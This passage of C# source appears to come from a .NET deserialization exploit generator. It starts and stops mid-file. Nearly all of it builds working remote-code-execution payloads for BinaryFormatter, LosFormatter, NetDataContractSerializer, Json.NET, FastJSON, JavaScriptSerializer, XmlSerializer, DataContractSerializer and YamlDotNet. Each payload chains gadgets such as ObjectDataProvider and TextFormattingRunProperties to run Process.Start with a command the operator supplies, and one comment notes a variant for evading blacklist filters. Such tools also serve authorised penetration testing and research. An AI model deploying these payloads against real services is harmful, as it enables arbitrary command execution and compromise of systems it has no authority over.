WZXJzaW9uBUl0ZW1zAAMABghJU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuQ29tcGFyaXNvbkNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsbXNjb3JsaWJdXQgHAAAA'},{'orderId':18,'typeBytes':null,'valueBytes':'AgAAAA=='},{'orderId':19,'typeBytes':'CQ==','valueBytes':'CAAAAA=='},{'orderId':20,'typeBytes':null,'valueBytes':'AgAAAA=='},{'orderId':21,'typeBytes':'CQ==','valueBytes':'CQAAAA=='},{'orderId':22,'typeBytes':'BA==','valueBytes':'CAAAAElTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZyxtc2NvcmxpYl1dAQAAAAtfY29tcGFyaXNvbgMiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcg=='},{'orderId':23,'typeBytes':'CQ==','valueBytes':'CgAAAA=='},{'orderId':24,'typeBytes':'EQ==','valueBytes':'CQAAAAIAAAA='},{'orderId':25,'typeBytes':'" + obj25Type + @"','valueBytes':'" + obj25Value + @"'},{'orderId':26,'typeBytes':'Bg==','valueBytes':'" + obj26Value + @"'},{'orderId':27,'typeBytes':'BA==','valueBytes':'CgAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVy'},{'orderId':28,'typeBytes':'CQ==','valueBytes':'DQAAAA=='},{'orderId':29,'typeBytes':'CQ==','valueBytes':'DgAAAA=='},{'orderId':30,'typeBytes':'CQ==','valueBytes':'DwAAAA=='},{'orderId':31,'typeBytes':'BA==','valueBytes':'DQAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQ=='},{'orderId':32,'typeBytes':'Bg==','valueBytes':'EAAAAKQBU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZyxtc2NvcmxpYl0sW1N5c3RlbS5TdHJpbmcsbXNjb3JsaWJdLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyxTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0='},{'orderId':33,'typeBytes':'Bg==','valueBytes':'EQAAAAhtc2NvcmxpYg=='},{'orderId':34,'typeBytes':'Cg==','valueBytes':''},{'orderId':35,'typeBytes':'Bg==','valueBytes':'EgAAAEZTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5'},{'orderId':36,'typeBytes':'Bg==','valueBytes':'EwAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzcw=='},{'orderId':37,'typeBytes':'Bg==','valueBytes':'FAAAAAVTdGFydA=='},{'orderId':38,'typeBytes':'CQ==','valueBytes':'FQAAAA=='},{'orderId':39,'typeBytes':'BA==','valueBytes':'DgAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgYAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAAMIDVN5c3RlbS5UeXBlW10='},{'orderId':40,'typeBytes':'CQ==','valueBytes':'FAAAAA=='},{'orderId':41,'typeBytes':'CQ==','valueBytes':'EgAAAA=='},{'orderId':42,'typeBytes':'CQ==','valueBytes':'EwAAAA=='},{'orderId':43,'typeBytes':'Bg==','valueBytes':'GQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQ=='},{'orderId':44,'typeBytes':null,'valueBytes':'CAAAAA=='},{'orderId':45,'typeBytes':'Cg==','valueBytes':''},{'orderId':46,'typeBytes':'AQ==','valueBytes':'DwAAAA4AAAA='},{'orderId':47,'typeBytes':'Bg==','valueBytes':'GgAAAAdDb21wYXJl'},{'orderId':48,'typeBytes':'CQ==','valueBytes':'EQAAAA=='},{'orderId':49,'typeBytes':'Bg==','valueBytes':'HAAAAA1TeXN0ZW0uU3RyaW5n'},{'orderId':50,'typeBytes':'Bg==','valueBytes':'HQAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcp'},{'orderId':51,'typeBytes':null,'valueBytes':'CAAAAA=='},{'orderId':52,'typeBytes':'Cg==','valueBytes':''},{'orderId':53,'typeBytes':'AQ==','valueBytes':'FQAAAA0AAAA='},{'orderId':54,'typeBytes':'Bg==','valueBytes':'HgAAAC1TeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLG1zY29ybGliXV0='},{'orderId':55,'typeBytes':'CQ==','valueBytes':'EQAAAA=='},{'orderId':56,'typeBytes':'Cg==','valueBytes':''},{'orderId':57,'typeBytes':'CQ==','valueBytes':'EQAAAA=='},{'orderId':58,'typeBytes':'CQ==','valueBytes':'HAAAAA=='},{'orderId':59,'typeBytes':'CQ==','valueBytes':'GgAAAA=='},{'orderId':60,'typeBytes':'Cg==','valueBytes':''},{'orderId':61,'typeBytes':'Cw==','valueBytes':''}]}";
bfSerializedObj = SimpleBinaryFormatterParser.JsonToStream(payload).ToArray();
}
else
{
// This is an example of using AdvancedBinaryFormatterParser which is recommended over SimpleBinaryFormatterParser but it is much longer
// In this gadget however, this feels like cheating as System.Resources.ResourceSet can be replaced by anything given the TextFormattingRunProperties gadget triggers first
ObjectDataProviderGenerator myObjectDataProviderGenerator = new ObjectDataProviderGenerator();
string xaml_payload = myObjectDataProviderGenerator.GenerateWithNoTest("xaml", inputArgs).ToString();
if (inputArgs.Minify)
{
xaml_payload = XMLMinifier.Minify(xaml_payload, null, null);
}
xaml_payload = CommandArgSplitter.JsonStringEscape(xaml_payload);
// This payload has been minified manually too by removing some of the unnecessary items!
payload = @"[{'Id': 1,
'Data': {
'$type': 'SerializationHeaderRecord',
'binaryFormatterMajorVersion': 1,
'binaryFormatterMinorVersion': 0,
'binaryHeaderEnum': 0,
'topId': 1,
'headerId': -1,
'majorVersion': 1,
'minorVersion': 0
}},{'Id': 2,
'TypeName': 'ObjectWithMapTyped',
'Data': {
'$type': 'BinaryObjectWithMapTyped',
'binaryHeaderEnum': 4,
'objectId': 1,
'name': 'System.Resources.ResourceSet',
'numMembers': 2,
'memberNames':['',''],
'binaryTypeEnumA':[3,3],
'typeInformationA':[null,null],
'typeInformationB':['',''],
'memberAssemIds':[0,0],
'assemId': 0
}},{'Id': 3,
'TypeName': 'MemberReference',
'Data': {
'$type': 'MemberReference',
'idRef': 2
}},{'Id': 4,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 1
}},{'Id': 5,
'TypeName': 'ObjectWithMapTyped',
'Data': {
'$type': 'BinaryObjectWithMapTyped',
'binaryHeaderEnum': 4,
'objectId': 2,
'name': 'System.Collections.Hashtable',
'numMembers': 5,
'memberNames':['LoadFactor','Version','Comparer','','HashSize'],
'binaryTypeEnumA':[0,0,3,3,0],
'typeInformationA':[11,8,null,null,8],
'typeInformationB':[11,8,'','',8],
'memberAssemIds':[0,0,0,0,0],
'assemId': 0
}},{'Id': 6,
'TypeName': 'Single',
'IsPrimitive': true,
'Data': {
'$type': 'MemberPrimitiveUnTyped',
'typeInformation': 11,
'value': 0
}},{'Id': 7,
'TypeName': 'Int32',
'IsPrimitive': true,
'Data': {
'$type': 'MemberPrimitiveUnTyped',
'typeInformation': 8,
'value': 1
}},{'Id': 8,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 1
}},{'Id': 9,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 1
}},{'Id': 10,
'TypeName': 'Int32',
'IsPrimitive': true,
'Data': {
'$type': 'MemberPrimitiveUnTyped',
'typeInformation': 8,
'value': 3
}},{'Id': 11,
'TypeName': 'Assembly',
'Data': {
'$type': 'BinaryAssembly',
'assemId': 7,
'assemblyString': 'Microsoft.PowerShell.Editor'
}},{'Id': 12,
'TypeName': 'ObjectWithMapTypedAssemId',
'Data': {
'$type': 'BinaryObjectWithMapTyped',
'binaryHeaderEnum': 5,
'objectId': 6,
'name': 'Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties',
'numMembers': 1,
'memberNames':['ForegroundBrush'],
'binaryTypeEnumA':[1],
'typeInformationA':[null],
'typeInformationB':[null],
'memberAssemIds':[0],
'assemId': 7
}},{'Id': 13,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 8,
'value': '" + xaml_payload + @"'
}},{'Id': 14,
'TypeName': 'MessageEnd',
'Data': {
'$type': 'MessageEnd'
}}]";
bfSerializedObj = AdvancedBinaryFormatterParser.JsonToStream(payload).ToArray();
}
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase))
{
if (inputArgs.Test)
{
try
{
MemoryStream ms = new MemoryStream(bfSerializedObj);
ms.Position = 0;
System.Runtime.Serialization.Formatters.Binary.BinaryFormatter bf = new System.Runtime.Serialization.Formatters.Binary.BinaryFormatter();
bf.Deserialize(ms);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(bfSerializedObj);
}
else
{
// it is LosFormatter
byte[] lfSerializedObj = SimpleMinifiedObjectLosFormatter.BFStreamToLosFormatterStream(bfSerializedObj);
MemoryStream ms = new MemoryStream(lfSerializedObj);
ms.Position = 0;
if (inputArgs.Test)
{
try
{
System.Web.UI.LosFormatter lf = new System.Web.UI.LosFormatter();
lf.Deserialize(ms);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(lfSerializedObj);
}
//return Serialize(myResourceSet, formatter, inputArgs);
}
else if (formatter.Equals("netdatacontractserializer", StringComparison.OrdinalIgnoreCase))
{
inputArgs.CmdType = CommandArgSplitter.CommandType.XML;
string ndcPayload = "";
if (internalgadget == 1)
{
string cmdPart = "";
if (inputArgs.HasArguments)
{
cmdPart = "<c:string>" + inputArgs.CmdArguments + "</c:string><c:string>" + inputArgs.CmdFileName + "</c:string>";
}
else
{
cmdPart = @"<c:string a:nil=""true""/><c:string>" + inputArgs.CmdFileName + "</c:string>";
}
ndcPayload = @"<w b:Type=""System.Resources.ResourceSet"" b:Assembly=""0"" xmlns=""http://schemas.datacontract.org/2004/07/System.Resources"" xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/""><Table b:Type=""System.Collections.Hashtable"" b:Assembly=""0"" xmlns:c=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""><LoadFactor b:Type=""System.Single"" b:Assembly=""0"" xmlns="""">0</LoadFactor><Version b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">1</Version><HashSize b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">3</HashSize><Values b:Type=""System.Object[]"" b:Assembly=""0"" b:Size=""1"" xmlns=""""><c:anyType b:Type=""System.Collections.Generic.SortedSet`1[[System.String,mscorlib]]"" b:Assembly=""System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089""><Count b:Type=""System.Int32"" b:Assembly=""0"">2</Count><Comparer b:Type=""System.Collections.Generic.ComparisonComparer`1[[System.String,mscorlib]]"" b:Assembly=""0""><_comparison b:FactoryType=""d:DelegateSerializationHolder"" b:Type=""System.DelegateSerializationHolder"" b:Assembly=""0"" xmlns=""http://schemas.datacontract.org/2004/07/System.Collections.Generic"" xmlns:d=""http://schemas.datacontract.org/2004/07/System""><Delegate b:Type=""System.DelegateSerializationHolder+DelegateEntry"" b:Assembly=""0"" xmlns=""""><d:assembly b:Id=""1"">mscorlib</d:assembly><d:delegateEntry><d:assembly b:Ref=""1"" a:nil=""1""/><d:delegateEntry a:nil=""1""/><d:methodName b:Id=""2"">Compare</d:methodName><d:target a:nil=""1""/><d:targetTypeAssembly b:Ref=""1"" a:nil=""1""/><d:targetTypeName b:Id=""3"">System.String</d:targetTypeName><d:type>System.Comparison`1[[System.String,mscorlib]]</d:type></d:delegateEntry><d:methodName b:Id=""4"">Start</d:methodName><d:target a:nil=""1""/><d:targetTypeAssembly b:Id=""5"">System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089</d:targetTypeAssembly><d:targetTypeName b:Id=""6"">System.Diagnostics.Process</d:targetTypeName><d:type>System.Func`3[[System.String,mscorlib],[System.String,mscorlib],[System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089]]</d:type></Delegate><method0 b:FactoryType=""e:MemberInfoSerializationHolder"" b:Type=""System.Reflection.MemberInfoSerializationHolder"" b:Assembly=""0"" xmlns=""""><Name b:Ref=""4"" a:nil=""1""/><AssemblyName b:Ref=""5"" a:nil=""1""/><ClassName b:Ref=""6"" a:nil=""1""/><Signature b:Type=""System.String"" b:Assembly=""0"">System.Diagnostics.Process Start(System.String, System.String)</Signature><MemberType b:Type=""System.Int32"" b:Assembly=""0"">8</MemberType><GenericArguments a:nil=""1""/></method0><method1 b:FactoryType=""e:MemberInfoSerializationHolder"" b:Type=""System.Reflection.MemberInfoSerializationHolder"" b:Assembly=""0"" xmlns=""""><Name b:Ref=""2"" a:nil=""1""/><AssemblyName b:Ref=""1"" a:nil=""1""/><ClassName b:Ref=""3"" a:nil=""1""/><Signature b:Type=""System.String"" b:Assembly=""0"">Int32 Compare(System.String, System.String)</Signature><MemberType b:Type=""System.Int32"" b:Assembly=""0"">8</MemberType></method1></_comparison></Comparer><Version b:Type=""System.Int32"" b:Assembly=""0"">2</Version><Items b:Type=""System.String[]"" b:Assembly=""0"" b:Size=""2"">" + cmdPart + @"</Items></c:anyType></Values></Table></w>";
}
else
{
ObjectDataProviderGenerator myObjectDataProviderGenerator = new ObjectDataProviderGenerator();
string xaml_payload = myObjectDataProviderGenerator.GenerateWithNoTest("xaml", inputArgs).ToString();
if (inputArgs.Minify)
{
xaml_payload = XMLMinifier.Minify(xaml_payload, null, null);
}
ndcPayload = @"<w b:Type=""System.Resources.ResourceSet"" b:Assembly=""0"" xmlns=""http://schemas.datacontract.org/2004/07/System.Resources"" xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/""><Table b:Type=""System.Collections.Hashtable"" b:Assembly=""0"" xmlns:c=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""><LoadFactor b:Type=""System.Single"" b:Assembly=""0"" xmlns="""">0</LoadFactor><Version b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">1</Version><HashSize b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">3</HashSize><Values b:Type=""System.Object[]"" b:Assembly=""0"" b:Size=""1"" xmlns=""""><c:anyType b:Type=""Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties"" b:Assembly=""Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35""><ForegroundBrush b:Type=""System.String"" b:Assembly=""0""><![CDATA[" + xaml_payload + @"]]></ForegroundBrush></c:anyType></Values></Table></w>";
//</Values></Table></w> can also be removed to make it even shorter! Why? IDK atm!
}
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
ndcPayload = XMLMinifier.Minify(ndcPayload, new string[] { "mscorlib", "Microsoft.PowerShell.Editor" }, new string[] { "</Values></Table></w>" }, FormatterType.NetDataContractXML, true);
}
else
{
ndcPayload = XMLMinifier.Minify(ndcPayload, null, new string[] { "</Values></Table></w>" }, FormatterType.NetDataContractXML, true);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.NetDataContractSerializer_deserialize(ndcPayload);
/*
* MemoryStream ms = new MemoryStream(Encoding.UTF8.GetBytes(ndcPayload));
* ms.Position = 0;
* ndcs.Deserialize(ms);
*/
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(ndcPayload);
//return Serialize(myResourceSet, formatter, inputArgs);
}
else
{
throw new Exception("Formatter not supported");
}
}
public override object Generate(string formatter, InputArgs inputArgs)
{
// NOTE: What is Xaml2? Xaml2 uses ResourceDictionary in addition to just using ObjectDataProvider as in Xaml
if (formatter.ToLower().Equals("xaml") || formatter.ToLower().Equals("xaml2"))
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = inputArgs.CmdFileName;
if (inputArgs.HasArguments)
{
psi.Arguments = inputArgs.CmdArguments;
}
StringDictionary dict = new StringDictionary();
psi.GetType().GetField("environmentVariables", BindingFlags.Instance | BindingFlags.NonPublic).SetValue(psi, dict);
Process p = new Process();
p.StartInfo = psi;
ObjectDataProvider odp = new ObjectDataProvider();
odp.MethodName = "Start";
odp.IsInitialLoadEnabled = false;
odp.ObjectInstance = p;
string payload = "";
if (formatter.ToLower().Equals("xaml2"))
{
ResourceDictionary myResourceDictionary = new ResourceDictionary();
myResourceDictionary.Add("", odp);
payload = XamlWriter.Save(myResourceDictionary);
}
else
{
payload = XamlWriter.Save(odp);
}
if (inputArgs.Minify)
{
// using discardable regex array to make it shorter!
payload = XMLMinifier.Minify(payload, null, new String[] { @"StandardErrorEncoding=.*LoadUserProfile=""False"" ", @"IsInitialLoadEnabled=""False"" " });
}
if (inputArgs.Test)
{
try
{
SerializersHelper.Xaml_deserialize(payload);
}
catch
{
}
}
return(payload);
}
if (formatter.ToLower().Equals("json.net"))
{
inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;
string cmdPart = "";
if (inputArgs.HasArguments)
{
cmdPart = "'" + inputArgs.CmdFileName + "', '" + inputArgs.CmdArguments + "'";
}
else
{
cmdPart = "'" + inputArgs.CmdFileName + "'";
}
String payload = @"{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':[" + cmdPart + @"]
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}";
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = JSONMinifier.Minify(payload, new String[] { "PresentationFramework", "mscorlib", "System" }, null);
}
else
{
payload = JSONMinifier.Minify(payload, null, null);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.JsonNet_deserialize(payload);
}
catch
{
}
}
return(payload);
}
else if (formatter.ToLower().Equals("fastjson"))
{
inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;
String cmdPart;
if (inputArgs.HasArguments)
{
cmdPart = @"""FileName"":""" + inputArgs.CmdFileName + @""",""Arguments"":""" + inputArgs.CmdArguments + @"""";
}
else
{
cmdPart = @"""FileName"":""" + inputArgs.CmdFileName + @"""";
}
String payload = @"{
""$types"":{
""System.Windows.Data.ObjectDataProvider, PresentationFramework, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = 31bf3856ad364e35"":""1"",
""System.Diagnostics.Process, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"":""2"",
""System.Diagnostics.ProcessStartInfo, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"":""3""
},
""$type"":""1"",
""ObjectInstance"":{
""$type"":""2"",
""StartInfo"":{
""$type"":""3"",
" + cmdPart + @"
}
},
""MethodName"":""Start""
}";
if (inputArgs.Minify)
{
payload = JSONMinifier.Minify(payload, null, null);
}
if (inputArgs.Test)
{
try
{
var instance = JSON.ToObject <Object>(payload);
}
catch
{
}
}
return(payload);
}
else if (formatter.ToLower().Equals("javascriptserializer"))
{
inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;
String cmdPart;
if (inputArgs.HasArguments)
{
cmdPart = "'FileName':'" + inputArgs.CmdFileName + "', 'Arguments':'" + inputArgs.CmdArguments + "'";
}
else
{
cmdPart = "'FileName':'" + inputArgs.CmdFileName + "'";
}
String payload = @"{
'__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'ObjectInstance':{
'__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'StartInfo': {
'__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
" + cmdPart + @"
}
}
}";
if (inputArgs.Minify)
{
payload = JSONMinifier.Minify(payload, null, null);
}
if (inputArgs.Test)
{
try
{
SerializersHelper.JavaScriptSerializer_deserialize(payload);
}
catch
{
}
}
return(payload);
}
else if (formatter.ToLower().Equals("xmlserializer"))
{
inputArgs.CmdType = CommandArgSplitter.CommandType.XML;
String cmdPart;
if (inputArgs.HasArguments)
{
cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>";
}
else
{
cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>";
}
String payload = $@"<?xml version=""1.0""?>
<root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" >
<ExpandedElement/>
<ProjectedProperty0>
<MethodName>Parse</MethodName>
<MethodParameters>
<anyType xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xsi:type=""xsd:string"">
<![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">{cmdPart}</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
</anyType>
</MethodParameters>
<ObjectInstance xsi:type=""XamlReader""></ObjectInstance>
</ProjectedProperty0>
</ExpandedWrapperOfXamlReaderObjectDataProvider>
</root>
";
if (inputArgs.Minify)
{
payload = XMLMinifier.Minify(payload, null, null, FormatterType.XMLSerializer, true);
}
if (inputArgs.Test)
{
try
{
SerializersHelper.XMLSerializer_deserialize(payload, null, "root");
}
catch
{
}
}
return(payload);
}
else if (formatter.ToLower().Equals("datacontractserializer2"))
{
// This by mixing what we had already in xmlserializer and datacontractserializer
// this can be useful to bypass deserializers that are based on a blacklist
inputArgs.CmdType = CommandArgSplitter.CommandType.XML;
String cmdPart;
if (inputArgs.HasArguments)
{
cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>";
}
else
{
cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>";
}
String payload = $@"<?xml version=""1.0""?>
<root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
<ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"">
<ExpandedElement z:Id=""ref1"" >
<__identity xsi:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/>
</ExpandedElement>
<ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data"">
<a:MethodName>Parse</a:MethodName>
<a:MethodParameters>
<anyType xsi:type=""xsd:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays"">
<![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">{cmdPart}</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
</anyType>
</a:MethodParameters>
<a:ObjectInstance z:Ref=""ref1""/>
</ProjectedProperty0>
</ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW>
</root>
";
if (inputArgs.Minify)
{
payload = XMLMinifier.Minify(payload, null, null, FormatterType.DataContractXML, true);
}
if (inputArgs.Test)
{
try
{
SerializersHelper.DataContractSerializer_deserialize(payload, null, "root");
}
catch
{
}
}
return(payload);
}
else if (formatter.ToLower().Equals("datacontractserializer"))
{
inputArgs.CmdType = CommandArgSplitter.CommandType.XML;
String cmdPart;
if (inputArgs.HasArguments)
{
cmdPart = $@"<b:anyType i:type=""c:string"">" + inputArgs.CmdFileName + @"</b:anyType>
<b:anyType i:type=""c:string"">" + inputArgs.CmdArguments + "</b:anyType>";
}
else
{
cmdPart = $@"<anyType i:type=""c:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays"">" + inputArgs.CmdFileName + @"</anyType>";
}
String payload = $@"<?xml version=""1.0""?>
<root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]],System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
<ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal""
xmlns:c=""http://www.w3.org/2001/XMLSchema""
xmlns:i=""http://www.w3.org/2001/XMLSchema-instance""
xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/""
>
<ExpandedElement z:Id=""ref1"" >
<__identity i:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/>
</ExpandedElement>
<ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data"">
<a:MethodName>Start</a:MethodName>
<a:MethodParameters xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/Arrays"">
" + cmdPart + @"
</a:MethodParameters>
<a:ObjectInstance z:Ref=""ref1""/>
</ProjectedProperty0>
</ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL>
</root>
";
if (inputArgs.Minify)
{
payload = XMLMinifier.Minify(payload, null, null, FormatterType.DataContractXML, true);
}
if (inputArgs.Test)
{
try
{
SerializersHelper.DataContractSerializer_deserialize(payload, null, "root");
}
catch
{
}
}
return(payload);
}
else if (formatter.ToLower().Equals("yamldotnet"))
{
inputArgs.CmdType = CommandArgSplitter.CommandType.YamlDotNet;
String cmdPart;
if (inputArgs.HasArguments)
{
cmdPart = $@"FileName: " + inputArgs.CmdFileName + @",
Arguments: " + inputArgs.CmdArguments;
}
else
{
cmdPart = $@"FileName: " + inputArgs.CmdFileName;
}
String payload = @"
!<!System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35> {
MethodName: Start,
ObjectInstance:
!<!System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089> {
StartInfo:
!<!System.Diagnostics.ProcessStartInfo,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089> {
" + cmdPart + @"
}
}
}";
if (inputArgs.Minify)
{
